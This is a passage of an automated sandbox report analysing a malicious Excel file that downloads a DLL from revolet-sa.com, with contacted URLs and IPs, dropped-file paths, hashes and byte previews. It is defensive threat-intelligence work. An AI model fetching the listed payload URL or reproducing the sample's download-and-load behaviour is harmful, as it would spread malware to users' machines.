                                                                                                              https://templatelogging.office.com/client/log3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorize3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.com3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v23B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/mac3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.ai3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.com3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devices3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorize3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                                                                  high

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  192.232.249.186
                                                                                                                                                  revolet-sa.comUnited States
                                                                                                                                                  46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                  Analysis ID:382906
                                                                                                                                                  Start date:06.04.2021
                                                                                                                                                  Start time:21:08:13
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 5m 12s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:SecuriteInfo.com.Heur.4923.xls
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:27
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal92.expl.evad.winXLS@5/9@1/1
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:
                                                                                                                                                  • Successful, ratio: 8.1% (good quality ratio 5.4%)
                                                                                                                                                  • Quality average: 64.3%
                                                                                                                                                  • Quality standard deviation: 45.9%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 9
                                                                                                                                                  • Number of non-executed functions: 4
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xls
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 104.43.139.144, 104.43.193.48, 52.109.88.177, 52.109.12.21, 52.109.76.36, 52.109.76.35, 40.88.32.150, 52.109.8.24, 13.88.21.125, 20.82.210.154, 23.57.80.111, 92.122.213.247, 92.122.213.194, 8.241.89.254, 67.26.81.254, 8.238.35.126, 8.241.126.249, 8.241.80.126, 20.54.26.129, 20.50.102.62
                                                                                                                                                  • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  21:09:10API Interceptor1x Sleep call for process: rundll32.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  192.232.249.186SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                                                                                                                                                  • revolet-sa.com/files/countryyelow.php

                                                                                                                                                  Domains

                                                                                                                                                  No context

                                                                                                                                                  ASN

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  UNIFIEDLAYER-AS-1USSecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                                                                                                                                                  • 192.232.249.186
                                                                                                                                                  document-1251000362.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.48.186
                                                                                                                                                  document-1251000362.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.48.186
                                                                                                                                                  catalogue-41.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 108.167.180.111
                                                                                                                                                  documents-1660683173.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.56.250
                                                                                                                                                  06iKnPFk8Y.dllGet hashmaliciousBrowse
                                                                                                                                                  • 162.241.54.59
                                                                                                                                                  06iKnPFk8Y.dllGet hashmaliciousBrowse
                                                                                                                                                  • 162.241.54.59
                                                                                                                                                  ddff.exeGet hashmaliciousBrowse
                                                                                                                                                  • 108.179.235.108
                                                                                                                                                  PowerShell_Input.ps1Get hashmaliciousBrowse
                                                                                                                                                  • 162.241.61.203
                                                                                                                                                  New PO#700-20-HDO410444RF217,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.122.118
                                                                                                                                                  Purchase Order.9000.scan.pdf...exeGet hashmaliciousBrowse
                                                                                                                                                  • 162.241.148.243
                                                                                                                                                  document-1848152474.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.48.186
                                                                                                                                                  7z7Q51Y8Xd.dllGet hashmaliciousBrowse
                                                                                                                                                  • 162.241.54.59
                                                                                                                                                  pySsaGoiCT.dllGet hashmaliciousBrowse
                                                                                                                                                  • 162.241.54.59
                                                                                                                                                  QOpv1PykFc.dllGet hashmaliciousBrowse
                                                                                                                                                  • 162.241.54.59
                                                                                                                                                  S4caD0RhXL.dllGet hashmaliciousBrowse
                                                                                                                                                  • 162.241.54.59
                                                                                                                                                  pH8YW11W1x.dllGet hashmaliciousBrowse
                                                                                                                                                  • 162.241.54.59
                                                                                                                                                  7z7Q51Y8Xd.dllGet hashmaliciousBrowse
                                                                                                                                                  • 162.241.54.59
                                                                                                                                                  pySsaGoiCT.dllGet hashmaliciousBrowse
                                                                                                                                                  • 162.241.54.59
                                                                                                                                                  QOpv1PykFc.dllGet hashmaliciousBrowse
                                                                                                                                                  • 162.241.54.59

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  C:\Users\user\sdbybsd.fdsSecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BDKsV[1].fbxSecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\3B5CB471-C353-487D-9D6C-395FC025FC6E
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):133170
                                                                                                                                                      Entropy (8bit):5.371008699609642
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:KcQIeNquBXA3gBwqpQ9DQW+zAM34ZldpKWXboOilXNErLdME9:CVQ9DQW+zTXiJ
                                                                                                                                                      MD5:10756852C05FF94F35816BDB0DA38F32
                                                                                                                                                      SHA1:4A572233D8581AF3C8318FB5201E186C1F3E6017
                                                                                                                                                      SHA-256:345149BA429C10C3ECE603C287FD6B6C45EA5B74179B483E0B202C3DF5240D09
                                                                                                                                                      SHA-512:C5B5A88C944712E1893006450570A59C8CA22C1E3FFFCF70968CD3D47860CD99B31E5E94DCA08C35338238D48D68B5FEA5FAC57FFA7E6FC27C88830E0BB7F9CE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-04-06T19:09:04">.. Build: 16.0.13925.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BDKsV[1].fbx
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:downloaded
                                                                                                                                                      Size (bytes):688241
                                                                                                                                                      Entropy (8bit):7.064532901692121
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx
                                                                                                                                                      MD5:7DF0611CD75FA4C02B29070728C37247
                                                                                                                                                      SHA1:1095F8922D93458EFBC97612D8A5DEA8DB8325A5
                                                                                                                                                      SHA-256:AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
                                                                                                                                                      SHA-512:167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious, Browse
                                                                                                                                                      Reputation:low
                                                                                                                                                      IE Cache URL:http://revolet-sa.com/files/countryyelow.php
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.N.............1...............1..........i/..92......R1..!...R1..+....(......R1......Rich............................PE..L....Kl`...........!.........@......>8..............................................................................@a..S............@.......................`..d^...................................................................................text...6u.......................... ..`.rdata..............................@..@.data........p...@...p..............@....idata...1.......@..................@....rsrc........@... ..................@..@.reloc...e...`...p..................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\AB810000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):67888
                                                                                                                                                      Entropy (8bit):7.879562534405804
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:AIcKYKrWGH5BAeWvi4qfaglMVGoIahaDHTU6hryF70Tm2:bcRKrW2fAi/yg2sTU2yF70Tm2
                                                                                                                                                      MD5:9C7C2264CB76535D64CAF2C6E95DFC01
                                                                                                                                                      SHA1:3BB9A459EC2B9817A2DA75562D8A8DEC0E293CF8
                                                                                                                                                      SHA-256:4251BFB31D510507F0CF7FDBD606C55A08D4C35399B679DDEC85ACD70E2C9E08
                                                                                                                                                      SHA-512:84B50F801985AACA02EB5FD7ECAE64C8B564F9A23406D6ACC6B8C7A23083F65200754A8E1A8721952AB2647C68CC1EB894EC9C3B71170605C59D3D01519777B1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: .U.n.0..G.."....BMw1.%Lb<..}.D..loK.c7....V-.$N...89^^.Z...CgM....+..+;....o.gV..F...k....V..-..CAh.j...p.D..Be...i.........5.......D4......_.......^.8.f..n]..Y..>.....$./..4..o@....D...4.M.r.Q.2..m.......4.:.K....6.w..[..;hJ.{....[....$.:...TUh.c.Ax{c.^!.Ag...Q.........\...J+.4mm..G..L.*%.......F......\.S.e..CU.Q./U..O.F.......O........?...r.....M...K.....S.....u..ft.(q.R_9s.G.}..cn.u......x...]:"B.;.{.T....w....!'QNh.|..~.......PK..........!..r.............[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                                                                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2178
                                                                                                                                                      Entropy (8bit):7.009949358885129
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:ib6UAjmoZC4o9DaDCbb6UmE8Xn5LwsRzkJdLOgDhOT:ib6zjTZNoOCbb65pLwOzKLDsT
                                                                                                                                                      MD5:9C4DF4FC661ABAF51CF74CF0E35D1C4C
                                                                                                                                                      SHA1:50F060C476684DC1C8ACC29E2B5F71A606B47281
                                                                                                                                                      SHA-256:A40468C48E669A2B829594A3C3253ED43EC70D1C019712773381D464D1077A60
                                                                                                                                                      SHA-512:5325E8880956D49A3AF9613DD0B738A2B8E7A6F4B096AD9AA50229B3CF6CA9D7576C5B406B55CED1606D9E4EB3A6E2AA30DFB54D31F3F25DC43F7D86A1912A5F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: ........................................user.....................\...................user.....................RSA1H.......?...........}...h8...B~k..!.R..<.HN:D...tW....5g.n.xLu5..tI. .q5e.. ........................z..O.......O.....F.....G|.....,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... ....3.n)H....<7g...&.K9b...d..g............... ...&.............M..r.f.,u.#...........A.G.j..}CV.P9...9.../...S=%..E..f.~..U.....^..!....7..az.....Z..k......1&.2.T...}..._.YeM&>....J<..:..\....th..\.g..E..NHe&B1.d.u..MHs.Z..BC..{c..JJ..M.d#.z..Q....kL...N...L.1b.2.4..]g....W....^W.?.....B.....3.....#WX.fA}.t...(X.n...=.....v#....c......v...k.|t....w........)G.?.2....\..0sk.Z.=.......sz&/].....l...D.5./w.. .U...a......23.G....@.\.b8..U.....g..L*..S.$......@...+....f....Xz..$...z0kU-.MY.:..I..r.n.bqH.Sz.....m.#o0..A.l.8..............z..O.......O.....F.....G|.........E.x.p.o.r.t. .F.l.a.g....f...... ...'.d....K.s.NE..,|.@...W.......K............ ....Z...x.
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Wed Apr 7 03:09:07 2021, atime=Wed Apr 7 03:09:07 2021, length=8192, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):904
                                                                                                                                                      Entropy (8bit):4.651048151814164
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:8N7EucXUAuElPCH2ANjB0l1Y0bhe+WrjAZ/2bDL1pLC5Lu4t2Y+xIBjKZm:8N7EuRNjB0YAZiDhA87aB6m
                                                                                                                                                      MD5:EE2C31887EAAB00547F9164E4C79D269
                                                                                                                                                      SHA1:4400A097930AD1B9932247FACEEE027D1DE05691
                                                                                                                                                      SHA-256:9EF3A70C84BF83D836A3610159FA80A5A72A76932F5C90465345451331B749C3
                                                                                                                                                      SHA-512:C64268DADF6A4B8DCD10952D3FCBB2C43FAD763029E40969E9706EC414C7DFFC05AA8F7323A1987B38FA336809454EFEA468B67C66B051BA47222A77ABC18712
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F........N....-....e.c+....b.c+... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.!....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..R.!.....S....................'hL.h.a.r.d.z.....~.1......R$!..Desktop.h.......Ny..R$!.....Y..............>.......<.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......830021...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Heur.4923.xls.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:43 2020, mtime=Wed Apr 7 03:09:07 2021, atime=Wed Apr 7 03:09:07 2021, length=95232, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2270
                                                                                                                                                      Entropy (8bit):4.6916808492333555
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:8POO04hF+cHhAaB6pPOO04hF+cHhAaB6:8gaKga
                                                                                                                                                      MD5:408EB73CAA3362B531D09346732B0E40
                                                                                                                                                      SHA1:78F0548A5DFAFEACC473675092271103A68FCB7A
                                                                                                                                                      SHA-256:C68785A0727F4D04EA8A0E9428E7DBEB0C3992EEF991D3A6B65B51706E4FE103
                                                                                                                                                      SHA-512:57290FDC674D44A9500EE8F5DDE1276B163C046EDD33BD78AFA7C3887C66C5873B250EB4100562F8852D059667E94DCC8D11DFC7FDF48811C3100077DAD3DC05
                                                                                                                                                      Malicious:true
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F.... .....:....=l.c+...=l.c+...t...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.!....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..R.!.....S....................'hL.h.a.r.d.z.....~.1.....>Qxx..Desktop.h.......Ny..R.!.....Y..............>......U9.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.! .SECURI~1.XLS..n......>Qvx.R.!....h.......................`.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...H.e.u.r...4.9.2.3...x.l.s.......d...............-.......c...........>.S......C:\Users\user\Desktop\SecuriteInfo.com.Heur.4923.xls..5.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...H.e.u.r...4.9.2.3...x.l.s.........:..,.LB.)...As...`.......X.......830021...........!a..%.H.VZAj...+..-.........-..!a..%.H.VZAj...+..-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):143
                                                                                                                                                      Entropy (8bit):4.800063931869927
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:oyBVomM0bGsmUuscbGsmUmM0bGsmUv:dj60Qf0b
                                                                                                                                                      MD5:9B43AB4375D898BAA5ABD7B4EF5C832A
                                                                                                                                                      SHA1:ECFA1B8E95B0370392CB2C597FFFD56F80BB7033
                                                                                                                                                      SHA-256:A54627B568E6F6B1836AD40600D4038AC871A9BB4AD92971A078302DFABF125A
                                                                                                                                                      SHA-512:6DEB96301AB7C5AD680F6B4FFF9C617F8D81A57924713161A62DD742BBEDCDBFF72C754FB5DA365C9DAED4827B6B12B31AACF50AB25FB0E8C723165FF68836F4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Heur.4923.xls.LNK=0..SecuriteInfo.com.Heur.4923.xls.LNK=0..[xls]..SecuriteInfo.com.Heur.4923.xls.LNK=0..
                                                                                                                                                      C:\Users\user\Desktop\8C810000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):150963
                                                                                                                                                      Entropy (8bit):7.187319419852758
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:4f8rmOAIyyzElBIL6lECbgBGzP5xLmECSS2jTUqyF70virW2akHKYakHuEef8rmV:S8rmOAIyyzElBIL6lECbgB+P5NmECSR1
                                                                                                                                                      MD5:3745257F4BBDBAE5A226D0CA20A87293
                                                                                                                                                      SHA1:EA83C5C590C562D5AC786E2856000A58E298DE67
                                                                                                                                                      SHA-256:4164FDA82D5366774FC4C9DCCE917FFCFBD0ED01BE4978448E5EB544C4893355
                                                                                                                                                      SHA-512:F684B763FD36307B187FB0212439C520C77D20B53D8A66CD1A491F756BF62E80360433B142ED379E6220BC533738C64DED17ACC28EE0AA63FA5FFA64ED81F9D7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: ........T8..........................\.p....pratesh B.....a.........=.................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1................e..C.a.l.i.b.r.i.1.........
                                                                                                                                                      C:\Users\user\sdbybsd.fds
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):688241
                                                                                                                                                      Entropy (8bit):7.064532901692121
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx
                                                                                                                                                      MD5:7DF0611CD75FA4C02B29070728C37247
                                                                                                                                                      SHA1:1095F8922D93458EFBC97612D8A5DEA8DB8325A5
                                                                                                                                                      SHA-256:AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
                                                                                                                                                      SHA-512:167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
